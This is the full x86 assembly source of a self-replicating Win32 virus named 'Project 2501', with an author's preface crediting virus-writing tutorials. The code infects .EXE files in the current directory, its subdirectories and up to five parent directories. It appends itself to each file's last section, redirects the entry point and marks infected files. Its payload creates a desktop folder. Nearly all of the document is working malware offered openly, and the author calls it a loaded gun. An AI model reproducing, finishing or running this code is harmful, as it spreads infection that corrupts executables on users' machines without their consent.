comment * Name: Project 2501 OS: Win32 Coder Belial Heya , this is my first Pe-infector.Wow ,a great feeling to have finished it. Credits go out to Lord Julus and BillyBelcebub ,because of their win32 tuturials.Without them ,i would never have finished this creation.It took me nearly a year to of reading to understand all the important aspects of Win32-Assembly. Greetings go out Wallo ,Raven and the whole Virus-channel on undernet. Also greetings to BillyBoy from Micro$oft.Thanx for your nice viriiparadise-OS.But not soooooo much bugs in future ,ok? I tested this virus only under Win98 ,so I dont know wether it works under WinME ,WinNT or Win95.But Im sure somebody will try it out. The Virus is a runtime exe infector.It infects all files in current dir and all his subdirectories.After this ,it makes one dotdot and infects new files and subdirs until it is in c:\ or five dotdots are done.The only payload my virus has is a directory on the desktop named "Project2501".It is created each run.Im thinking of putting a txtfile in this directory ,but I have no real motivation at the moment.A bedder payload is in progress.And a nice encryption ,I hope.If you think this virus may be a bit incomplete (no encryption and no kewl payload) than i have to say: With releasing this source i release a loaded gun.In the wrong hands ,it could be awful for some harmless user.So if I release guns I dont want to release "full-automatic-guns" .Thats for now BeLiAL * .586 .model flat .data db 0 db 'This is the first generation of project2501' .code start: call delta_setup delta_setup: pop ebp sub ebp,offset delta_setup get_those_apis: mov eax,dword ptr [esp] and eax,0ffff0000h mov ecx,0 call find_mz_and_pe call find_all_apis Infection_part: mov byte ptr [ebp+dir_counter],0 mov byte ptr [ebp+am_i_up],0 mov eax,dword ptr [ebp+image_base] mov dword ptr [ebp+image_base2],eax mov eax,dword ptr [ebp+old_entry_point] mov dword ptr [ebp+old_entry_point2],eax call seek_and_destroy payload_part: call payload reanimation_part: cmp ebp,0 je exit_here mov eax,dword ptr [ebp+image_base2] add eax,dword ptr [ebp+old_entry_point2] jmp eax exit_here: push 0 call [ebp+ExitProcess] find_mz_and_pe proc add ecx,1 cmp ecx,11 je mz_not_found mov bx,word ptr [eax] cmp bx,'ZM' je find_the_pe sub eax,010000h jmp find_mz_and_pe find_the_pe: mov esi,eax mov ebx,dword ptr [eax+3ch] add eax,ebx mov bx,word ptr [eax] cmp bx,'EP' jne mz_not_found mov dword ptr [ebp+kernelbase],esi mov dword ptr [ebp+kernelpeheader],eax ret mz_not_found: jmp reanimation_part find_mz_and_pe endp find_apis proc pop esi pop eax mov dword ptr [ebp+apinameoffset],eax pop eax mov dword ptr [ebp+apilenght],eax pop eax mov dword ptr [ebp+putitthere],eax push esi mov eax,dword ptr [ebp+kernelpeheader] mov esi,dword ptr [eax+78h] add esi,dword ptr [ebp+kernelbase] add esi,1ch mov eax,dword ptr [esi] add eax,dword ptr [ebp+kernelbase] mov dword ptr [ebp+adress_table_VA],eax add esi,4 mov eax,dword ptr [esi] add eax,dword ptr [ebp+kernelbase] mov dword ptr [ebp+name_table_VA],eax add esi,4 mov eax,dword ptr [esi] add eax,dword ptr [ebp+kernelbase] mov dword ptr [ebp+ordinal_table_VA],eax mov esi,dword ptr [ebp+name_table_VA] mov dword ptr [ebp+apicounter],00000000h find_the_name: push esi mov eax,dword ptr [esi] add eax,dword ptr [ebp+kernelbase] mov esi,eax mov edi,dword ptr [ebp+apinameoffset] mov ecx,0 mov cl,byte ptr [ebp+apilenght] cld rep cmpsb jz we_found_it pop esi add esi,4 inc dword ptr [ebp+apicounter] jmp find_the_name we_found_it: pop esi ;taken from BillyBel mov eax,dword ptr [ebp+apicounter] shl eax,1 add eax,dword ptr [ebp+ordinal_table_VA] mov esi,0 xchg eax,esi lodsw shl eax,2 add eax,dword ptr [ebp+adress_table_VA] mov esi,eax lodsd add eax,dword ptr [ebp+kernelbase] mov ecx,dword ptr [ebp+putitthere] mov dword ptr [ecx],eax ret find_apis endp find_all_apis proc lea eax,[ebp+offset ExitProcess] push eax push dword ptr [ebp+exitprocesslenght] lea eax,[ebp+offset _ExitProcess] push eax call find_apis lea eax,[ebp+offset FindFirstFileA] push eax push dword ptr [ebp+findfirstfilelenght] lea eax,[ebp+offset _FindFirstFileA] push eax call find_apis lea eax,[ebp+offset FindNextFileA] push eax push dword ptr [ebp+findnextfilelenght] lea eax,[ebp+offset _FindNextFileA] push eax call find_apis lea eax,[ebp+offset CreateFileA] push eax push dword ptr [ebp+createfilelenght] lea eax,[ebp+offset _CreateFileA] push eax call find_apis lea eax,[ebp+offset CloseHandle] push eax push dword ptr [ebp+closehandlelenght] lea eax,[ ebp+offset _CloseHandle] push eax call find_apis lea eax,[ebp+offset CreateFileMappingA] push eax push dword ptr [ebp+createfilemappinglenght] lea eax,[ebp+offset _CreateFileMappingA] push eax call find_apis lea eax,[ebp+offset MapViewOfFile] push eax push dword ptr [ebp+mapviewoffilelenght] lea eax,[ebp+offset _MapViewOfFile] push eax call find_apis lea eax,[ebp+offset UnmapViewOfFile] push eax push dword ptr [ebp+unmapviewoffilelenght] lea eax,[ebp+offset _UnmapViewOfFile] push eax call find_apis lea eax,[ebp+offset GetFileSize] push eax push dword ptr [ebp+getfilesizelenght] lea eax,[ebp+offset _GetFileSize] push eax call find_apis lea eax,[ebp+offset SetFilePointer] push eax push dword ptr [ebp+setfilepointerlenght] lea eax,[ebp+offset _SetFilePointer] push eax call find_apis lea eax,[ebp+offset SetEndOfFile] push eax push dword ptr [ebp+setendoffilelenght] lea eax,[ebp+offset _SetEndOfFile] push eax call find_apis lea eax,[ebp+offset SetCurrentDirectoryA] push eax push dword ptr [ebp+setcurrentdirectorylenght] lea eax,[ebp+offset _SetCurrentDirectoryA] push eax call find_apis lea eax,[ebp+offset CreateDirectoryA] push eax push dword ptr [ebp+createdirectorylenght] lea eax,[ebp+offset _CreateDirectoryA] push eax call find_apis ret find_all_apis endp seek_and_destroy proc find_first_file: mov byte ptr [ebp+infection_flag],0 lea eax,[ebp+offset FindFileData] push eax lea eax,[ebp+offset tosearch] push eax call [ebp+FindFirstFileA] mov dword ptr [ebp+findfilehandle],eax inc eax jz no_files_left jmp open_the_file find_next_file: mov byte ptr [ebp+infection_flag],0 lea eax,[ebp+offset FindFileData] push eax push dword ptr [ebp+findfilehandle] call [ebp+FindNextFileA] test eax,eax jz no_files_left open_the_file: push 0 push 0 push 3 push 0 push 1 push 80000000h + 40000000h lea eax,[ebp+offset FindFileData.cFileName] push eax call [ebp+CreateFileA] cmp eax,0ffffffffh je find_next_file mov dword ptr [ebp+filehandle],eax push 0 push dword ptr [ebp+filehandle] Call [ebp+GetFileSize] calculate_new_size: mov dword ptr [ebp+thefilesize],eax add eax,virus_end-start add eax,100 now_make_file_mapping: push 0 push eax push 0 push 4 push 0 push dword ptr [ebp+filehandle] call [ebp+CreateFileMappingA] mov dword ptr [ebp+filemappinghandle],eax mov eax,dword ptr [ebp+thefilesize] add eax,virus_end-start add eax,100 push eax push 0 push 0 push 2 push dword ptr [ebp+filemappinghandle] call [ebp+MapViewOfFile] mov dword ptr [ebp+mapadress],eax cmp word ptr [eax],'ZM' jne search_another mov ebx,0 mov bx,word ptr [eax+3ch] cmp word ptr [eax+ebx],'EP' jne search_another cmp word ptr [eax+38h],'AA' je search_another call infect_file search_another: cmp byte ptr [ebp+infection_flag],1 je close_normal call close_not_normal close_normal: push dword ptr [ebp+mapadress] call [ebp+UnmapViewOfFile] push dword ptr [ebp+filemappinghandle] call [ebp+CloseHandle] push dword ptr [ebp+filehandle] call [ebp+CloseHandle] jmp find_next_file no_files_left: cmp byte ptr [ebp+am_i_up],1 je go_down lea eax,[ebp+offset FindFileData] push eax lea eax,[ebp+offset allfiles] push eax call [ebp+FindFirstFileA] mov dword ptr [ebp+dir_search_handle],eax inc eax jz no_dirs_left cmp byte ptr [ebp+FindFileData.cFileName],'.' je find_next_dir jmp is_it_dir find_next_dir: lea eax,[ebp+offset FindFileData] push eax push dword ptr [ebp+dir_search_handle] call [ebp+FindNextFileA] test eax,eax jz no_dirs_left cmp byte ptr [ebp+FindFileData.cFileName],'.' je find_next_dir is_it_dir: cmp dword ptr [ebp+FindFileData.dwFileAttributes],10h je it_is_dir jmp find_next_dir it_is_dir: lea eax,[ebp+FindFileData.cFileName] push eax call [ebp+SetCurrentDirectoryA] mov byte ptr [ebp+am_i_up],1 jmp find_first_file no_dirs_left: lea eax,[ebp+offset dotdot] push eax call [ebp+SetCurrentDirectoryA] add byte ptr [ebp+dir_counter],1 cmp byte ptr [ebp+dir_counter],5 je all_for_now mov byte ptr [ebp+am_i_up],0 jmp find_first_file all_for_now: ret go_down: lea eax,[ebp+offset dotdot] push eax call [ebp+SetCurrentDirectoryA] mov byte ptr [ebp+am_i_up],0 jmp find_next_dir seek_and_destroy endp close_not_normal proc push 0 push 0 push dword ptr [ebp+thefilesize] push dword ptr [ebp+filehandle] call [ebp+SetFilePointer] push dword ptr [ebp+filehandle] call [ebp+SetEndOfFile] ret close_not_normal endp infect_file proc mov byte ptr [ebp+infection_flag],1 mov eax,dword ptr [ebp+mapadress] mov word ptr [eax+38h],'AA' mov edi,0 mov di,word ptr [eax+3ch] add eax,edi ;peheader at eax mov dword ptr [ebp+peheader_offset],eax mov esi,dword ptr [eax+28h] mov dword ptr [ebp+old_entry_point],esi mov esi,dword ptr [eax+3ch] mov dword ptr [ebp+file_allign],esi mov esi,dword ptr [eax+34h] mov dword ptr [ebp+image_base],esi mov esi,eax go_to_last_section: mov ebx,dword ptr [esi+74h] shl ebx,3 mov eax,0 mov ax,word ptr [esi+6h] dec eax mov ecx,28h mul ecx add esi,78h add esi,ebx add esi,eax modify_it: or dword ptr [esi+24h],00000020h or dword ptr [esi+24h],20000000h or dword ptr [esi+24h],80000000h mov eax, [esi+10h] ;code taken from Lord Julus (im not good in math) mov dword ptr [ebp+old_raw_size],eax add dword ptr [esi+8h],(offset virus_end - offset start) mov eax,dword ptr [esi+8h] mov ecx,dword ptr [ebp+file_allign] div ecx mov ecx,dword ptr [ebp+file_allign] sub ecx,edx mov dword ptr [esi+10h],eax mov eax,dword ptr [esi+8h] add eax,dword ptr [esi+10h] mov dword ptr [esi+10h],eax mov dword ptr [ebp+new_raw_size],eax mov eax,dword ptr [esi+0ch] add eax,dword ptr [esi+8h] sub eax,(offset virus_end-offset start) mov dword ptr [ebp+new_entry],eax mov eax,dword ptr [ebp+old_raw_size] mov ebx,dword ptr [ebp+new_raw_size] sub ebx,eax mov dword ptr [ebp+inc_raw_size],ebx mov eax,dword ptr [esi+14h] add eax,dword ptr [ebp+new_raw_size] mov dword ptr [ebp+new_file_size],eax mov eax,dword ptr [esi+14h] add eax,dword ptr [esi+8] sub eax,(offset virus_end-offset start) add eax,dword ptr [ebp+mapadress] mov edi,eax lea esi,[ebp+offset start] mov ecx,(offset virus_end-offset start) rep movsb mov esi,dword ptr [ebp+peheader_offset] mov eax,dword ptr [ebp+new_entry] mov dword ptr [esi+28h],eax mov eax,dword ptr [ebp+inc_raw_size] add dword ptr [esi+50h],eax ret infect_file endp payload proc push 0 lea eax,[ebp+offset dir_name] push eax call [ebp+CreateDirectoryA] ret payload endp new_file_size dd 0 inc_raw_size dd 0 new_entry dd 0 new_raw_size dd 0 old_raw_size dd 0 file_allign dd 0 peheader_offset dd 0 image_base dd 0 old_entry_point dd 0 image_base2 dd 0 old_entry_point2 dd 0 kernelbase dd 0 kernelpeheader dd 0 adress_table_VA dd 0 name_table_VA dd 0 ordinal_table_VA dd 0 apicounter dd 00000000h apinameoffset dd 0 apilenght dd 0 putitthere dd 0 ExitProcess dd 00000000h _ExitProcess db 'ExitProcess',0 exitprocesslenght dd 12 FindFirstFileA dd 00000000h _FindFirstFileA db 'FindFirstFileA',0 findfirstfilelenght dd 15 FindNextFileA dd 00000000h _FindNextFileA db 'FindNextFileA',0 findnextfilelenght dd 14 CreateFileA dd 00000000h _CreateFileA db 'CreateFileA',0 createfilelenght dd 12 CloseHandle dd 00000000h _CloseHandle db 'CloseHandle',0 closehandlelenght dd 12 CreateFileMappingA dd 00000000h _CreateFileMappingA db 'CreateFileMappingA',0 createfilemappinglenght dd 19 MapViewOfFile dd 00000000h _MapViewOfFile db 'MapViewOfFile',0 mapviewoffilelenght db 14 UnmapViewOfFile dd 00000000h _UnmapViewOfFile db 'UnmapViewOfFile',0 unmapviewoffilelenght dd 16 GetFileSize dd 00000000h _GetFileSize db 'GetFileSize',0 getfilesizelenght dd 12 SetEndOfFile dd 00000000h _SetEndOfFile db 'SetEndOfFile',0 setendoffilelenght dd 13 SetFilePointer dd 00000000h _SetFilePointer db 'SetFilePointer',0 setfilepointerlenght dd 15 SetCurrentDirectoryA dd 0 _SetCurrentDirectoryA db 'SetCurrentDirectoryA',0 setcurrentdirectorylenght dd 21 CreateDirectoryA dd 0 _CreateDirectoryA db 'CreateDirectoryA',0 createdirectorylenght dd 17 mapadress dd 0 infection_flag db 0 tosearch db '*.EXE',0 findfilehandle dd 0 filehandle dd 0 thefilesize dd 0 filemappinghandle dd 0 credit db 'Project2501 was coded by BeLiAL' db 'Greetings to a nice girl from scandinavia' dotdot db '..',0 allfiles db '*.*',0 dir_search_handle dd 0 am_i_up db 0 dir_name db 'c:\windows\desktop\Project2501',0 dir_counter db 0 MAX_PATH EQU 260 FILETIME struct dwLowDateTime DWORD ? dwHighDateTime DWORD ? FILETIME ends WIN32_FIND_DATA struct dwFileAttributes DWORD ? ftCreationTime FILETIME <> ftLastAccessTime FILETIME <> ftLastWriteTime FILETIME <> nFileSizeHigh DWORD ? nFileSizeLow DWORD ? dwReserved0 DWORD ? dwReserved1 DWORD ? cFileName BYTE MAX_PATH dup(?) cAlternate BYTE 0eh dup(?) ends FindFileData WIN32_FIND_DATA <> virus_end: end start